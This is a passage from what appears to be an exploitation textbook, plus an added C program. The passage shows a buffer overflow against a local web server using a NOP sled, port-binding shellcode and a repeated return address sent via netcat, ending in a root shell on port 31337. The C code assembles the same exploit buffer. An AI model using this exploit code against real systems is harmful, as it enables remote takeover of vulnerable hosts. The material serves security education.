Even though the remote shell doesn't display a prompt, it still accepts
commands and returns the output over the network.
A program like netcat can be used for many other things. It's designed to
work like a console program, allowing standard input and output to be piped
and redirected. Using netcat and the port-binding shellcode in a file, the same
exploit can be carried out on the command line.
reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ echo $((540+4 - 300 - 92))
152
reader@hacking:~/booksrc $ echo $((152 / 4))
38
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300';
> cat portbinding_shellcode
> perl -e 'print "\x88\xf6\xff\xbf"x38 . "\r\n"')
[raw buffer bytes echoed to the terminal; the NOP sled, shellcode and repeated address are mostly unprintable characters]
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38 . "\r\n"') | nc -v -w1 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -v 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root
In the output above, wc -c first shows that the port-binding shellcode is
92 bytes long. The saved return address sits 540 bytes from the start of the
buffer, so 544 bytes are needed to reach through it (540 plus the 4-byte
address itself). With a 300-byte NOP sled and 92 bytes of shellcode, 152 bytes
remain. Since 152 is a multiple of 4, repeating the 4-byte target address 38
times at the end of the buffer lands the last copy exactly on the saved return
address; if the remainder were not a multiple of 4, the last copy would
straddle the slot and the overwrite would miss. The address is written low
byte first ("\x88\xf6\xff\xbf" for 0xbffff688) because x86 is little-endian.
Finally, the buffer is terminated with '\r\n'. The commands that build the
buffer are grouped in parentheses so their combined output is piped into
netcat, which connects to the tinyweb program on port 80 and sends the buffer.
After the shellcode runs, netcat has to be broken out of with CTRL-C, since
the original socket connection is still open. Then netcat is used again to
connect to the shell bound on port 31337.
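The buffer layout described above, as an added example in C rather than the perl one-liner on the page (this is not code from the book). It computes the repeat count from the offsets the page gives, rejects a layout whose remainder is not a multiple of 4, writes the target address little-endian, and emits the raw bytes so the program can be piped into netcat the same way. The 92-byte shellcode is a constructed stand-in of 0xCC bytes, not the page's port-binding shellcode; the offset 540, sled length 300 and address 0xbffff688 are the page's values.

```c
/* Added example: assemble an exploit buffer with the layout
 *   [NOP sled][shellcode][target address repeated][\r\n]
 * Assumed constants are the values used on the page. The shellcode used in
 * main()/demo_payload() is a constructed stand-in (0xCC breakpoints). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RET_OFFSET 540           /* buffer offset of the saved return address (page) */
#define NOP_LEN    300           /* NOP sled length used on the page */
#define RET_ADDR   0xbffff688u   /* target address "\x88\xf6\xff\xbf" read little-endian */

/* Number of times the 4-byte address must be repeated after the shellcode so
 * that the last copy lands exactly on the saved return address.
 * Returns -1 if the sled and shellcode do not fit, or the remainder is not
 * a multiple of 4 (the last copy would straddle the slot). */
long ret_repeats(size_t sc_len, size_t nop_len, size_t ret_offset)
{
    size_t region = ret_offset + 4;            /* through the 4-byte slot: 544 */
    if (nop_len + sc_len > region) return -1;
    size_t fill = region - nop_len - sc_len;   /* 152 on the page */
    if (fill % 4 != 0) return -1;
    return (long)(fill / 4);                   /* 38 on the page */
}

/* Build the payload into out (capacity cap). Returns bytes written or -1. */
long build_payload(const unsigned char *sc, size_t sc_len, size_t nop_len,
                   size_t ret_offset, uint32_t ret_addr,
                   unsigned char *out, size_t cap)
{
    long reps = ret_repeats(sc_len, nop_len, ret_offset);
    if (reps < 0) return -1;
    size_t total = nop_len + sc_len + 4 * (size_t)reps + 2;  /* + "\r\n" */
    if (total > cap) return -1;

    unsigned char *p = out;
    memset(p, 0x90, nop_len);  p += nop_len;   /* NOP sled */
    memcpy(p, sc, sc_len);     p += sc_len;    /* shellcode */
    for (long i = 0; i < reps; i++) {          /* address, low byte first */
        p[0] = (unsigned char)(ret_addr);
        p[1] = (unsigned char)(ret_addr >> 8);
        p[2] = (unsigned char)(ret_addr >> 16);
        p[3] = (unsigned char)(ret_addr >> 24);
        p += 4;
    }
    *p++ = '\r'; *p++ = '\n';                  /* terminate the request line */
    return (long)(p - out);
}

/* Read 4 bytes at off as a little-endian value (used to verify the overwrite). */
uint32_t read_le32(const unsigned char *buf, size_t off)
{
    return (uint32_t)buf[off] | ((uint32_t)buf[off + 1] << 8) |
           ((uint32_t)buf[off + 2] << 16) | ((uint32_t)buf[off + 3] << 24);
}

/* Build the demo payload with the page's sizes and check its layout.
 * Returns the payload length (546) on success, -1 on any mismatch. */
long demo_payload(void)
{
    unsigned char sc[92];
    memset(sc, 0xCC, sizeof sc);               /* constructed stand-in shellcode */
    unsigned char buf[1024];
    long n = build_payload(sc, sizeof sc, NOP_LEN, RET_OFFSET, RET_ADDR, buf, sizeof buf);
    if (n != 546) return -1;                                   /* 544 + "\r\n" */
    if (buf[0] != 0x90 || buf[299] != 0x90) return -1;         /* sled */
    if (buf[300] != 0xCC || buf[391] != 0xCC) return -1;       /* shellcode */
    if (read_le32(buf, 392) != RET_ADDR) return -1;            /* first copy */
    if (read_le32(buf, RET_OFFSET) != RET_ADDR) return -1;     /* last copy on saved EIP */
    if (buf[544] != '\r' || buf[545] != '\n') return -1;
    return n;
}

int main(void)
{
    unsigned char sc[92];
    memset(sc, 0xCC, sizeof sc);               /* constructed stand-in shellcode */
    unsigned char buf[1024];
    long n = build_payload(sc, sizeof sc, NOP_LEN, RET_OFFSET, RET_ADDR, buf, sizeof buf);
    if (n < 0) { fprintf(stderr, "layout does not fit or is misaligned\n"); return 1; }
    fwrite(buf, 1, (size_t)n, stdout);         /* pipe: ./payload | nc -v -w1 127.0.0.1 80 */
    return 0;
}
```

Replacing the stand-in with real shellcode only changes sc_len; ret_repeats() then recomputes the repeat count and refuses a layout whose remainder would leave the last address copy straddling the saved return address, which is the check worth doing before sending anything over the wire.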